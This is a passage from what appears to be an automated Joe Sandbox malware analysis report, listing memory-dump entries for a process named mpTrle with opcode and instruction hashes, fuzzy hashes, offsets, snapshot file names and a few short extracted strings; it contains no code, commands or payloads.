                                                      • Opcode ID: d7894df82611f742b4f06685f6d9e95d5741908b1b1256f75e3d9182842090fb
                                                      • Instruction ID: 35d767b527e5419c62593b7091766560f3f0f1f2d8e43a0efa6b132bfa90213c
                                                      • Opcode Fuzzy Hash: d7894df82611f742b4f06685f6d9e95d5741908b1b1256f75e3d9182842090fb
                                                      • Instruction Fuzzy Hash: 4E4118B4E00218DFDB48DFA9D590AAEB7B2EF88350F10856AD815E7391D731E942CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4f658f78d7fe42bfd23ec00e622233dd3f6aaf5d4203e0b73a92b78c318980c
                                                      • Instruction ID: 8b851228357dde047fce96a62bc551efe685c5dd98dbabfb05bcaf7daa19e85f
                                                      • Opcode Fuzzy Hash: b4f658f78d7fe42bfd23ec00e622233dd3f6aaf5d4203e0b73a92b78c318980c
                                                      • Instruction Fuzzy Hash: 0C41FFB4E54208DBCB04CFA8D884AEDFBB5FF89311F108169D816A7201D730AA46CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 798c9db6ed052801208c7f769b94c28e62e03d3512f56c0e5c63a424e6c90c8f
                                                      • Instruction ID: c68698ddb2972c7d8f46514fcff18b221ad43b75b8258896393c5a9edf25b8d4
                                                      • Opcode Fuzzy Hash: 798c9db6ed052801208c7f769b94c28e62e03d3512f56c0e5c63a424e6c90c8f
                                                      • Instruction Fuzzy Hash: AB3138B4E002099FDB05DFA9D881AEEBBB1FF8D310F108565E914A7394D7709A51CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420442809.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_20d000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a92672c3c0ca5c0e1264f1da231e9da4a5716750198690012be84deee09fef71
                                                      • Instruction ID: f8343713b96df0ef979c1314db3bccc6cb85b36a8f9db192d284ed56559fbdea
                                                      • Opcode Fuzzy Hash: a92672c3c0ca5c0e1264f1da231e9da4a5716750198690012be84deee09fef71
                                                      • Instruction Fuzzy Hash: 7821D075625300EFEB01DF94D9C0B26BBA1EB84314F24C6A9EC094B287C376D866CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420442809.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_20d000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cb1fc0e9b72b7ca63c28fe92e823e36a1fd5d0067e36f1f70129dbf15033835
                                                      • Instruction ID: 25d01fb0d0d397a348d87c57570350f550c3ced5a5084761203e5de43ba44173
                                                      • Opcode Fuzzy Hash: 4cb1fc0e9b72b7ca63c28fe92e823e36a1fd5d0067e36f1f70129dbf15033835
                                                      • Instruction Fuzzy Hash: 91210075224300DFEB10CF64D8C4B16BB62EB84314F30C569D80D4B283C336D826CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 231d4f44b9827d7a21712cbde2304f919e0e9ae8fcf0f74f38597f5564e5727f
                                                      • Instruction ID: d0c118fac765fe1d82974fcac8f78831ccb6250ad3040ac3b28f2a17aadb7ea8
                                                      • Opcode Fuzzy Hash: 231d4f44b9827d7a21712cbde2304f919e0e9ae8fcf0f74f38597f5564e5727f
                                                      • Instruction Fuzzy Hash: 3D31D274A10908DFD708DF9AE68499DBBF1FF8D300B6280E4D444AB365EB70AE11DB18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c8565fa76ba792885abefb1ba155af9b69ce83111e06d0c0a52a605bcfc9a8a
                                                      • Instruction ID: b1052f64049f73dd33cee9c8bb9fd73226b178a47cc219e4ea8305e07aa8e8cb
                                                      • Opcode Fuzzy Hash: 8c8565fa76ba792885abefb1ba155af9b69ce83111e06d0c0a52a605bcfc9a8a
                                                      • Instruction Fuzzy Hash: E821FCB8E09209DFCB44CF99D1809AEBBF5FB89300F6191A9D409A7715D730AE41CF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420442809.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_20d000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                      • Instruction ID: 8aff57b21165e5207a57f62686056d0315556bf28210102bf74fe3d775c47f61
                                                      • Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                      • Instruction Fuzzy Hash: CF118B75504380DFDB11CF54D9C4B15BFA2EB84314F24C6AAD8494B696C33AD85ACFA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420442809.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_20d000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                      • Instruction ID: 374cd26e101d087d1811ae6c4e24d825195af4fdd22d9ba3e9295ae1c2ac5915
                                                      • Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                      • Instruction Fuzzy Hash: 2E11A975505380DFDB01CF54C5C4B15BBA1FB84314F24C6AADC494B697C33AD86ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3b9da018f0cf7ad34e443220563ab59a3f55f62753485a15096e784f396ba9a
                                                      • Instruction ID: ed3736229b87fc5acb0c17caff2daef8826b6b203e0d389fd413fa702c43d940
                                                      • Opcode Fuzzy Hash: a3b9da018f0cf7ad34e443220563ab59a3f55f62753485a15096e784f396ba9a
                                                      • Instruction Fuzzy Hash: 4611D478A00508EFC740DF99E58499DBFF0FB89310F5240E5E88497769DB70AAA5CB49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3db1d54d81117a7492393ae83c67e1f8270e8e8226a81780198ed60a4a7ecf03
                                                      • Instruction ID: d9e3a7d2a429f128d52744e1f1344de4881e335da1a194e87a8585d8833c5359
                                                      • Opcode Fuzzy Hash: 3db1d54d81117a7492393ae83c67e1f8270e8e8226a81780198ed60a4a7ecf03
                                                      • Instruction Fuzzy Hash: FF11DB70E05718DFDB08CF66D8945ADBBB6BF8A301F10C069E409AB364DB30A941CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79f1a48d3f397fb7ee9ab99341841739c773fb2017ea38c7a9a188417911e2e5
                                                      • Instruction ID: 671fd5ad72586a73dd8977cde54dba199551bb4dab15efbe568f77aeb66291d3
                                                      • Opcode Fuzzy Hash: 79f1a48d3f397fb7ee9ab99341841739c773fb2017ea38c7a9a188417911e2e5
                                                      • Instruction Fuzzy Hash: 3A01EC74B45604EFDB04DBA4C694AADBBF5EB4D301F158094D4099B351D730EE00EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b70f5a33924b08c5112a74db7dc0f6ae9d9a68def91542a654b09bfd8fd1f76
                                                      • Instruction ID: 14cf43d2f44698cd6fbfc74e2eab867004b8980a52553857092d516b0afd3f2e
                                                      • Opcode Fuzzy Hash: 4b70f5a33924b08c5112a74db7dc0f6ae9d9a68def91542a654b09bfd8fd1f76
                                                      • Instruction Fuzzy Hash: 8BE0C2B150670CEBD700EFF0DA5479E7FACDB0B204F1141B5810A93150EF315A009B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f28acec7849a4777e260d8b12edde697061c10cf15b64a8a76fcafdcf872c311
                                                      • Instruction ID: cbf4ba33270fb6b32f4c5f94f4305fe107668d097e68fc6e6c13abdb07351fbf
                                                      • Opcode Fuzzy Hash: f28acec7849a4777e260d8b12edde697061c10cf15b64a8a76fcafdcf872c311
                                                      • Instruction Fuzzy Hash: 57E01274905208DFCB04EFA4D99166CBB78EB8A304F2495E9C81817341DB31BE46DB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c2915aa74a039e2be0143015838901df2b8861662445eb0fb907d3ace592901
                                                      • Instruction ID: bfcfc7507297a6192a986f19bf5ad4592046d4b410ef2fa1c178559beb8fe147
                                                      • Opcode Fuzzy Hash: 8c2915aa74a039e2be0143015838901df2b8861662445eb0fb907d3ace592901
                                                      • Instruction Fuzzy Hash: A3C08C300027048BE3242B90FC1C3287E58BB02206F041230D408000308F309481CA69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 036fae608bb94ffc674791265aa5a76ea2f32051731241d8925e9effcef9558b
                                                      • Instruction ID: d428cb91b738b5b6f66506bcc474d37fcfa0e32300f066566b5727167644e71a
                                                      • Opcode Fuzzy Hash: 036fae608bb94ffc674791265aa5a76ea2f32051731241d8925e9effcef9558b
                                                      • Instruction Fuzzy Hash: 2A63D731D10B1A8ADB11EF68C884699F7B1FF99300F15C79AE459B7121EB70AAD4CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e4bda5e6bb565754d49db59d863f24d1070409ea65ba5114dac52c9054f7756
                                                      • Instruction ID: 5c82f29fd9668ab3f072f1f971fb66c4411ee1d5a14607df5006770ab67f7003
                                                      • Opcode Fuzzy Hash: 9e4bda5e6bb565754d49db59d863f24d1070409ea65ba5114dac52c9054f7756
                                                      • Instruction Fuzzy Hash: A4333B31D107198ECB11EF68C8846ADF7B1FF99300F15D79AE449AB215EB70AAC5CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VLl
                                                      • API String ID: 0-3496349822
                                                      • Opcode ID: 511921f711e9166e6e40c3e99c900a21e3a80bd2bd1a8f8c8944131e99be28b9
                                                      • Instruction ID: f8f1d011576d7fc88b9950e0e911a0614f68fbc825fcaba50297b2b0d70daf5b
                                                      • Opcode Fuzzy Hash: 511921f711e9166e6e40c3e99c900a21e3a80bd2bd1a8f8c8944131e99be28b9
                                                      • Instruction Fuzzy Hash: 7F915C70E10209CFDF15CFA9C9857AEBBF2AF88314F15C129E405AB298DB749945CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0389a60104fbdef976bc7d3c1a6306132f642042f5d4f9d3c5dfcd9719c9664
                                                      • Instruction ID: 7d0e310697932181496034224241b85ab8bc710ef54a8cb70ecb22692e8c07cb
                                                      • Opcode Fuzzy Hash: f0389a60104fbdef976bc7d3c1a6306132f642042f5d4f9d3c5dfcd9719c9664
                                                      • Instruction Fuzzy Hash: 33926734A00204CFDB21DF68D598A5DBBB2FB85314F56C46AE409AB369DB35EC85CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 83a252258c1255f654bdffb332b9d89f7fa1c3adcd76b49eab953f66ea796fb7
                                                      • Instruction ID: 18e95ae94723b31cd09f2dc00a0edfe2500fb76f002ed545c725c1e11a98bd25
                                                      • Opcode Fuzzy Hash: 83a252258c1255f654bdffb332b9d89f7fa1c3adcd76b49eab953f66ea796fb7
                                                      • Instruction Fuzzy Hash: 08326F34B002098FDF14DF68D595BAEBBB6FB88310F14852AE405EB354EB35EC528B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5033596fc254bd384df9608fc14d0a19f20ae89e6d164a7dce679254e77ba15e
                                                      • Instruction ID: d03f09971b1b9bdd9fae0e181ff1852201e58e0fc89416c1dc946055e56f6641
                                                      • Opcode Fuzzy Hash: 5033596fc254bd384df9608fc14d0a19f20ae89e6d164a7dce679254e77ba15e
                                                      • Instruction Fuzzy Hash: 64227370A006048FEF24DB68D4947EEBBB2FB95310F648936E405EB395DB35EC818B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e7ddb4868d83e1e1af4de6735b482a7ea57e0c0fe0ec8509da3688ca4a6a4a8
                                                      • Instruction ID: 9c1b34a0196c8937494103a9815bcc8bd8ee31af5469ced50d84765797c911a8
                                                      • Opcode Fuzzy Hash: 9e7ddb4868d83e1e1af4de6735b482a7ea57e0c0fe0ec8509da3688ca4a6a4a8
                                                      • Instruction Fuzzy Hash: 92323030E106198FCB15EF74D89469DB7B6FFD9300F11C66AE409AB254EB70AD81CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6d18622bbb4f6ad1995d3e7b8ee2b77f415353b129813a4b812a22d22090b8a
                                                      • Instruction ID: 5954fb17f98493d95bd20a59cf6693cb1a87812194ba0a093fbc5f666e6818be
                                                      • Opcode Fuzzy Hash: b6d18622bbb4f6ad1995d3e7b8ee2b77f415353b129813a4b812a22d22090b8a
                                                      • Instruction Fuzzy Hash: 08121E30E10719CFCB15EF74D89459DB7B6BFD9300F21C6AAE4096B264EB70A981CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ba2cfc450d2b9472cb0aeb5e1e46e9e38346ab2838d9f4fea78fb75960e06a5
                                                      • Instruction ID: 8ae31f503bdb8155f3c852d9cdd8781a7575c90dcdc3d6ecd7c251f380bc200f
                                                      • Opcode Fuzzy Hash: 8ba2cfc450d2b9472cb0aeb5e1e46e9e38346ab2838d9f4fea78fb75960e06a5
                                                      • Instruction Fuzzy Hash: 3EB16E70E10209CFDF11CFA9C8857DEBBF2AF89314F25C529E815A7258EB759845CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VLl$\VLl
                                                      • API String ID: 0-3638086151
                                                      • Opcode ID: b2f08c5bf5852367ae6a8295f0f181dd2ffc3729f95f5d073758b8cc0a0a04c8
                                                      • Instruction ID: 609601d0722aaca2d40d67689720caafd55836e3eb85452cfaf0965c005e2fe1
                                                      • Opcode Fuzzy Hash: b2f08c5bf5852367ae6a8295f0f181dd2ffc3729f95f5d073758b8cc0a0a04c8
                                                      • Instruction Fuzzy Hash: B9714C70E10209CFDB16DFA9C84679EBBF2AF88314F24C129E414AB258EB749841CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &55p
                                                      • API String ID: 0-1955183375
                                                      • Opcode ID: a7a652e1c2bdb3a55dfe21b0e2774991b7307afbf5b74606bde877e975c9362d
                                                      • Instruction ID: 43ab3a894b217e97614c163ca67261143aa92a4dc45247ba4768dc2ff704caf7
                                                      • Opcode Fuzzy Hash: a7a652e1c2bdb3a55dfe21b0e2774991b7307afbf5b74606bde877e975c9362d
                                                      • Instruction Fuzzy Hash: D1F12E34A01204CFDB19EFA4D5A97AEB7B2FF85300F648569E4059F359DB71AC42CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d@r
                                                      • API String ID: 0-3576339456
                                                      • Opcode ID: d71afe7a583f9b601e17f42150119d274c6d222e5d397c8a41283de3fe123194
                                                      • Instruction ID: b70f86d31a7083b1739231b8ed5eb8aba204078934c01f041281c79c2b358cfe
                                                      • Opcode Fuzzy Hash: d71afe7a583f9b601e17f42150119d274c6d222e5d397c8a41283de3fe123194
                                                      • Instruction Fuzzy Hash: 00E17D30A007098FDB25DFA5D4947AEBBB2FF85311F20852AE405EB354DB70AC468B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VLl
                                                      • API String ID: 0-3496349822
                                                      • Opcode ID: 97b77bb803e8224c2cf1865c34764bd7d7339209e3b60079917a576d2ea50a8e
                                                      • Instruction ID: fd73f9177a7736e81a057f2afb436499eb6e707eb1c10bd064d46c575d6a939b
                                                      • Opcode Fuzzy Hash: 97b77bb803e8224c2cf1865c34764bd7d7339209e3b60079917a576d2ea50a8e
                                                      • Instruction Fuzzy Hash: 28915C70E10209DFDF11CFA9C9857DEBBF1AF88314F248129E415AB298DB749985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &55p
                                                      • API String ID: 0-1955183375
                                                      • Opcode ID: 385cefc8155c82c4a78f134ebe6b730c613aa4d7a4c974f1ebcebdfe24c5c343
                                                      • Instruction ID: 3cf4cc00fd1f4b86899b2ada0a000f82efe49fc0318c032ccbef58a5c944e2d9
                                                      • Opcode Fuzzy Hash: 385cefc8155c82c4a78f134ebe6b730c613aa4d7a4c974f1ebcebdfe24c5c343
                                                      • Instruction Fuzzy Hash: 77815C34A01204CFDB19EF65D5A9B9EB7B6FF85300FA48529E405DB399CB75AC42CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1fe80339d852ac922adfb2b58a35cbdf3b2e775e932fd6d9e9a8619189d7f04d
                                                      • Instruction ID: dae139967a2c6ce4e0702c472a9059c401c5ea3c57709b6e26a3b9586fb29e5d
                                                      • Opcode Fuzzy Hash: 1fe80339d852ac922adfb2b58a35cbdf3b2e775e932fd6d9e9a8619189d7f04d
                                                      • Instruction Fuzzy Hash: DA622E30A047098FDB14EFA8D495A9DB7A6FF84314B608A29E4099F358DB71FD46CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f492993a16f5fd912f7f8cdc4851aa9aef5614d71fc3d189f00776a3c358858
                                                      • Instruction ID: 22833991398f877d70780b65fb899f437951d5229edf2c3625d71846395ef188
                                                      • Opcode Fuzzy Hash: 3f492993a16f5fd912f7f8cdc4851aa9aef5614d71fc3d189f00776a3c358858
                                                      • Instruction Fuzzy Hash: BA229070700305CFDB16AB78E85962C77A6FB86355B608D3AE019CB359CF71ED4A8B81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74461bcf7c4f41ac4af7faec66b18b175fe396585f207c0059a00385168e5d94
                                                      • Instruction ID: 2e2aad83aff047a4d46e7188513abeb520dcff12ab804ddd50a992031dba677c
                                                      • Opcode Fuzzy Hash: 74461bcf7c4f41ac4af7faec66b18b175fe396585f207c0059a00385168e5d94
                                                      • Instruction Fuzzy Hash: 2B026C30A006098FDF24DFA8D4847AEB7B1FB85310F24892AE415EB351EB75ED95CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66b5702fd6724780a8bec1cc16e920ede9b38ff3fa3bda116080ece174d78d0f
                                                      • Instruction ID: dcc63d6170b423acd586a05231b251a387d8a7f5886ed7ac66324fcf94cc394c
                                                      • Opcode Fuzzy Hash: 66b5702fd6724780a8bec1cc16e920ede9b38ff3fa3bda116080ece174d78d0f
                                                      • Instruction Fuzzy Hash: A7B1E261A0E3D05FDB13673AA8682C53FB19F43226F4E41EBD085CF5A3E5585C89C36A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
